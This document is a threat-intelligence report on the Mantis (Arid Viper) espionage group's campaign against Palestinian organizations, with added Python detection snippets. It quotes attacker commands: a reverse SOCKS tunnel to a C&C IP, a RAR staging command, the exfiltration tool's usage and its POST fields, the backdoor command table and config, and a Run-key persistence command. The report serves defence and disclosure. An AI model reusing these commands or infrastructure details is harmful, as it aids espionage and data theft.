Mantis: New tool used in attacks on Palestinian targets

Espionage groups invest time and effort in avoiding detection and persisting on compromised networks.
The Mantis cyber espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to operate out of the Palestinian territories, is conducting ongoing attacks, deploying an updated toolset and going to great lengths to maintain a persistent presence on targeted networks.
The group is known for targeting organizations in the Middle East, but the recent activity discovered by Symantec, a subsidiary of Broadcom Software, is focused on organizations in the Palestinian territories. The malicious activity began in September 2022 and continued until at least February 2023. This kind of targeting is not unprecedented for Mantis: the group was previously found attacking individuals located in the Palestinian territories in 2017.

Background

Mantis has been active since 2014, and some third-party reports indicate it may have been active as early as 2011. The group is known for targeting organizations in Israel and a number of other Middle Eastern countries. Target areas include government, military, finance, media, education, energy and think tanks. The group is known for using phishing emails and fake social media profiles to trick targets into installing malware on their devices.

Mantis is widely believed to have ties to the Palestinian territories. Symantec has not been able to make a definitive attribution to any Palestinian organization, although other vendors have linked the group to Hamas.

In its latest attack, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to infect targets, followed by widespread credential theft and exfiltration of stolen data.

Attack chain

The initial infection vector in this campaign is unclear. In one targeted organization, the attackers deployed three distinct versions of the same toolset (i.e. different variants of the same tools) on three separate sets of computers. Compartmentalizing the attack in this way is most likely a precaution: if one toolset is discovered, the attackers can still maintain a persistent presence on the target network with the others.

The following describes the use of one of the three toolsets:

Malicious activity was first detected on December 18, 2022, when three separate sets of obfuscated PowerShell commands were executed to load a Base64-encoded string that launched embedded shellcode. The shellcode is a 32-bit loader that uses raw TCP to download another stage from the command-and-control (C&C) server at 104.194.222[.]50 on port 4444.

The attackers returned on December 19, first performing a credential dump and then using Certutil and BITSAdmin to download the Micropsia backdoor and PuTTY, a publicly available SSH client.

Micropsia was then executed and began contacting the C&C server. On the same day, Micropsia was also executed on three other machines in the same organization. In each case it ran from a folder named after its file name:

csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe

On one computer, Micropsia was used to set up a reverse SOCKS tunnel to an external IP address:

CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED]

On December 20, Micropsia was used to run an unknown executable file called windowspackages.exe on one of the infected computers.

The next day, December 21, RAR was executed to archive files on another infected computer.

From December 22 to January 2, 2023, Micropsia was used to execute the Arid Gopher backdoor on three infected computers. Arid Gopher was in turn used to run a tool called SetRegRunKey.exe, which provides persistence by adding Arid Gopher to the registry so that it executes across reboots. It also ran an unknown file called localsecuritypolicy.exe (the attackers used this file name elsewhere for the Arid Gopher backdoor).

On December 28, Micropsia was used to run windowspackages.exe on three additional infected computers.

On December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and networkuefidiagsbootserver.exe on two infected computers.

By January 2, the attackers had retired the version of Arid Gopher they were using and introduced a new variant. Whether this was because the first version had been discovered or is simply standard operating procedure is unclear.

On January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, from the folder csidl_common_appdata\hostupbroker\ on a single computer. This was followed by the exfiltration of a RAR file:

CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar

On January 9, Arid Gopher was used to execute two unknown files on a single computer:

csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embededmodeservice\embededmodeservice.exe

The last malicious activity observed occurred after January 12, when Arid Gopher was used to execute an unknown file named localsecuritypolicy.exe every ten hours.

Micropsia

The Micropsia backdoor variant used in these attacks appears to be a slightly updated version of the one documented by other vendors. In this campaign, Micropsia was deployed using multiple file names and file paths:

csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe

Micropsia is executed via WMI, and its main purpose appears to be running the attackers' secondary payloads. These include:

Arid Gopher (File name: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Reverse SOCKs Tunneler (aka Revsocks) (File name: windowsservicemanageav.exe)
Data exfiltration tool (file name: windowsupserv.exe)
Two unknown files, both named hostupbroker.exe
Unknown file named windowspackages.exe

In addition, Micropsia has its own capabilities, such as taking screenshots, keylogging, and using WinRAR to archive certain file types in preparation for data exfiltration:

"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" ar -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%*.xls" "%USERPROFILE%*.xlsx" "%USERPROFILE%*.doc" "%USERPROFILE%*.docx" "%USERPROFILE%*.csv" "%USERPROFILE%*.pdf" "%USERPROFILE%*.ppt" "%USERPROFILE%*.pptx" "%USERPROFILE%*.odt" "%USERPROFILE%*.mdb" "%USERPROFILE%*.accdb" "%USERPROFILE%*.accde" "%USERPROFILE%*.txt" "%USERPROFILE%*.rtf" "%USERPROFILE%*.vcf"
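The archiving command above is a useful detection opportunity on its own: the combination of encrypted headers, split volumes, a date filter and a long list of document wildcards from the user profile rarely appears in legitimate use. The following is an added example (not code from the report or from Symantec) that scores a process command line for that staging pattern; the sample command is constructed after the one above, with the password replaced by a placeholder and the `a` (add) command assumed.

```python
import re
import shlex

# Document extensions the observed Rar.exe command collected from %USERPROFILE%
DOC_EXTS = {"xls", "xlsx", "doc", "docx", "csv", "pdf", "ppt", "pptx", "odt",
            "mdb", "accdb", "accde", "txt", "rtf", "vcf"}
# %USERPROFILE%*.ext as observed (the backslash is optional)
PROFILE_WILDCARD = re.compile(r"%userprofile%\\?\*\.(\w+)", re.IGNORECASE)

# Constructed sample modelled on the command in the report (password replaced)
SAMPLE_CMD = (
    r'"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" a -ep1 -v2500k '
    r'-hpPLACEHOLDER_PASSWORD -ta2023-01-14 "%PROGRAMDATA%\Software Distributions\Bdl\out" '
    r'"%USERPROFILE%*.xls" "%USERPROFILE%*.docx" "%USERPROFILE%*.pdf" '
    r'"%USERPROFILE%*.csv" "%USERPROFILE%*.txt" "%USERPROFILE%*.accdb"'
)


def analyze_rar_cmdline(cmdline):
    """Return staging indicators for a rar.exe/winrar.exe command line (None for
    other images): encrypted headers (-hp), split volumes (-v), a newer-than-date
    filter (-ta) and many document wildcards under the user profile."""
    # posix=False keeps Windows quoting and backslashes intact
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens or not tokens[0].lower().endswith("rar.exe"):
        return None
    switches = [t.lower() for t in tokens[1:] if t.startswith("-")]
    has = lambda prefix: any(s.startswith(prefix) for s in switches)
    exts = {m.group(1).lower() for t in tokens[1:]
            for m in [PROFILE_WILDCARD.fullmatch(t)] if m}
    doc_types = sorted(exts & DOC_EXTS)

    indicators = []
    if has("-hp"):
        indicators.append("encrypted archive and file names (-hp)")
    if has("-v"):
        indicators.append("split into volumes (-v)")
    if has("-ta"):
        indicators.append("only files newer than a date (-ta)")
    if len(doc_types) >= 5:
        indicators.append("%d document types from the user profile" % len(doc_types))
    # Three of the four together is the staging pattern worth alerting on
    return {"indicators": indicators, "document_types": doc_types,
            "suspicious": len(indicators) >= 3}


def scan_command_lines(lines):
    """Return the command lines (with their findings) that look like staging."""
    hits = [(line, analyze_rar_cmdline(line)) for line in lines]
    return [(line, r) for line, r in hits if r and r["suspicious"]]
```

Feed it the CommandLine field of process-creation events (Sysmon event 1 or Security 4688); a plain `rar.exe a backup.rar` produces no indicators and is not flagged.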

Arid Gopher

Unlike Micropsia, which is written in Delphi, Arid Gopher is written in Go. The version of Arid Gopher used in this campaign contains the following embedded components:

7za.exe – a copy of a legitimate 7-Zip executable
AttestationWmiProvider.exe – A tool for setting the "run" registry value
ServiceHubIdentityHost.exe – A copy of Optimum X's legitimate Shortcut.exe executable
Setup.env – Configuration file

Arid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe, localsecuritypolicy.exe and networkuefidiagsbootserver.exe. In addition, it was used to download and execute files obfuscated with PyArmor.

When communicating with the C&C server, Arid Gopher registers the device on one path and then connects to another, presumably to receive commands:

Connects to: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – possibly to register the device
Then connects to: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – probably to receive commands
Connects to: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – possibly to register the device
Then connects to: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – probably to receive commands

Arid Gopher appears to be regularly updated and rewritten by the attackers, most likely to evade detection. One variant differs enough from its predecessor that no subroutine shares identical code with the previous version. Mantis appears to actively move logic between variants, which is a time-consuming task if done manually.

The analyzed variant accepts the following commands; the handler each appears to map to is inferred from function names in the binary:

Command Description
"c" Perhaps related to main.exC("cmd")
"d" Perhaps related to main.down2
"s" Perhaps related to main.OnDSH
"ci" Perhaps related to main.deviceProperties
"ps" Perhaps related to main.exC("powershell")
"ra" Perhaps related to main.RunAWithoutW
"sf" Perhaps related to main.updateSettings
"sl" Perhaps related to main.searchForLogs
"ua" Perhaps related to main.updateApp
"ut" Perhaps related to main.updateT
"pwnr" Perhaps related to main.exCWithoutW("powershell")
"rapp" Perhaps related to main.restartApp
"gelog" Perhaps related to main.upAppLogs
"ufbtt" Perhaps related to main.collectFi
"ufofd" Perhaps related to main.collectFiOrFol
"bwp" Perhaps related to main.browDat
"cbh" Perhaps related to main.delBD
"cwr" Perhaps related to main.exCWithoutW("cmd")
"gaf" Perhaps related to main.collectFi
"ntf" Perhaps related to main.collectNet
"smr" Perhaps related to main.updateSettings

The embedded setup.env file is used by the analyzed Arid Gopher variant to retrieve its configuration and contains the following:

DIR=WindowsPerceptionService
ENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER
LOGS=logs.txt
DID=code.txt
VER=6.1
EN=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
COMPRESSOR=7za.exe
DDIR=ResourcesFiles
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=ServiceHubIdentityHost.exe

The setup.env configuration file references another file, AttestationWmiProvider.exe, which is also embedded in Arid Gopher. This file is a 32-bit executable that acts as a helper, ensuring that another executable runs on reboot. When executed, it checks for the following command line parameters:

"key" with string parameter [RUN_VALUE_NAME]

"value" with string parameter [RUN_PATHNAME]

It then registers for signal notifications using os/signal.Notify(). Once notified, it sets the following registry value:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[RUN_VALUE_NAME]" = "[RUN_PATHNAME]"

Our investigation so far shows this file being used to set Arid Gopher to run on reboot:

CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService "-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x"
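For hunting, the helper's command line tells you in advance exactly which Run value will appear, and the value data follows the layout seen throughout this campaign: an executable under ProgramData in a folder of the same name. The following is an added example (not Symantec's or the project's code) that predicts the Run entry from a process-creation event and applies that layout heuristic to Run entries generally; the sample invocation is constructed after the one above, and CSIDL_COMMON_APPDATA is assumed to resolve to C:\ProgramData.

```python
import ntpath
import shlex

# Locations the report shows the backdoors running from (CSIDL_COMMON_APPDATA
# resolves to C:\ProgramData on a default installation; assumption, not from the report)
PROGRAMDATA_PREFIXES = ("csidl_common_appdata\\", "c:\\programdata\\", "%programdata%\\")

# Constructed sample modelled on the helper invocation in the report
SAMPLE_HELPER_CMD = (
    r'CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe '
    r'-key=NetworkVirtualizationStartService '
    r'"-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x"'
)


def predict_run_value(cmdline):
    """Return the (value name, value data) pair the helper will write under the
    HKCU Run key, or None if the image is not the helper or -key/-value is missing."""
    # posix=False keeps Windows quoting: "-value=... -x" stays one token
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens or ntpath.basename(tokens[0]).lower() != "attestationwmiprovider.exe":
        return None
    args = {}
    for tok in tokens[1:]:
        if tok.startswith("-") and "=" in tok:
            name, _, value = tok[1:].partition("=")
            args[name.lower()] = value
    if "key" not in args or "value" not in args:
        return None
    return args["key"], args["value"]


def run_entry_is_suspicious(value_data):
    """Hunting heuristic for Run entries: the image lives under ProgramData in a
    folder named after the executable, the layout both backdoors use here."""
    image = shlex.split(value_data, posix=False)[0].strip('"').lower()
    if not image.startswith(PROGRAMDATA_PREFIXES):
        return False
    folder = ntpath.basename(ntpath.dirname(image))
    stem, _ = ntpath.splitext(ntpath.basename(image))
    return folder == stem


def triage_helper_invocation(cmdline):
    """For one process-creation event: what will be persisted, and is it worth an alert."""
    predicted = predict_run_value(cmdline)
    if predicted is None:
        return None
    name, data = predicted
    return {"run_value": name, "image_cmd": data,
            "suspicious": run_entry_is_suspicious(data)}
```

The heuristic is a triage aid, not proof: some legitimate software also installs as ProgramData\Name\Name.exe, so confirm with the file's signature and the Micropsia/Arid Gopher hashes before acting.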

Data exfiltration tool

The attackers also used a custom tool to exfiltrate data stolen from target organizations: a 64-bit PyInstaller executable named WindowsUpServ.exe. When run, the tool checks for the following command line parameters:

"-d" "[FILE_DIRECTORY]"
"-f" "[FILENAME]"

For each "-f" "[FILENAME]" command line argument, the tool uploads the contents of [FILENAME]. For each "-d" "[FILE_DIRECTORY]" command line argument, the tool gets the list of files stored in the folder [FILE_DIRECTORY] and uploads the contents of each file.

For each file uploaded, the tool sends an HTTP POST request to the C&C server with the following parameters:

"kjdfnqweb": [THE_FILE_CONTENT]
"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]

Whenever the remote server responds with status code 200, the malware deletes the uploaded files from the local disk. The malware may also log some of its behavior in the following files:

"C:\ProgramData\WindowsUpServ\success.txt"
"C:\ProgramData\WindowsUpServ\err.txt"
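The two form field names are distinctive enough to match on at a web proxy or in captured traffic. The following is an added example (not code from the report) that inspects a raw HTTP request for both fields and reports the victim hostname and the number of bytes leaving; the report does not say how the tool encodes the body, so urlencoded and multipart forms are both handled, and the three requests are constructed samples.

```python
import re
from urllib.parse import parse_qs

# Form field names the exfiltration tool uses (from the report)
FIELD_CONTENT = "kjdfnqweb"   # uploaded file content
FIELD_HOST = "qyiwekq"        # hostname of the affected computer

# One multipart part: Content-Disposition line, optional extra headers, blank line, data
MULTIPART_FIELD = re.compile(
    rb'name="([^"]+)"[^\r\n]*\r\n(?:[^\r\n]+\r\n)*\r\n(.*?)\r\n--', re.S)


def parse_exfil_post(raw_request):
    """Inspect one raw HTTP request (bytes). Returns {"host": ..., "bytes": n}
    when it carries both exfiltration fields, otherwise None."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    if not head.startswith(b"POST "):
        return None
    if b"multipart/form-data" in head.lower():
        fields = {m.group(1).decode(): m.group(2) for m in MULTIPART_FIELD.finditer(body)}
    else:
        parsed = parse_qs(body.decode(errors="replace"), keep_blank_values=True)
        fields = {k: v[0].encode() for k, v in parsed.items()}
    if FIELD_CONTENT not in fields or FIELD_HOST not in fields:
        return None
    return {"host": fields[FIELD_HOST].decode(errors="replace"),
            "bytes": len(fields[FIELD_CONTENT])}


# Constructed samples: a multipart upload, a urlencoded upload and a benign login
SAMPLE_MULTIPART = (
    b"POST /upload HTTP/1.1\r\nHost: exfil.example\r\n"
    b"Content-Type: multipart/form-data; boundary=XX\r\n\r\n"
    b'--XX\r\nContent-Disposition: form-data; name="qyiwekq"\r\n\r\nWKSTN-01\r\n'
    b'--XX\r\nContent-Disposition: form-data; name="kjdfnqweb"; filename="a.rar"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\nRar!\x1a\x07\x01\x00DATA\r\n--XX--\r\n"
)
SAMPLE_URLENCODED = (
    b"POST /upload HTTP/1.1\r\nHost: exfil.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"qyiwekq=WKSTN-02&kjdfnqweb=hello+world"
)
SAMPLE_BENIGN = (
    b"POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\nuser=alice&pass=x"
)
```

Because the tool only deletes a file after a 200 response, a proxy that blocks these requests with any other status code also preserves the staged archives on disk for the incident responders.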

A determined adversary

Mantis appears to be a determined adversary willing to invest time and effort to maximize its chances of success, as evidenced by its extensive malware rewrites and by splitting its attacks against individual organizations into separate parts to reduce the chance of the entire operation being detected.

Indicators of compromise


Original article by Chief Security Officer; if reproduced, please credit https://cncso.com/en/mantis-used-in-attacks-against-palestinian-targets-html
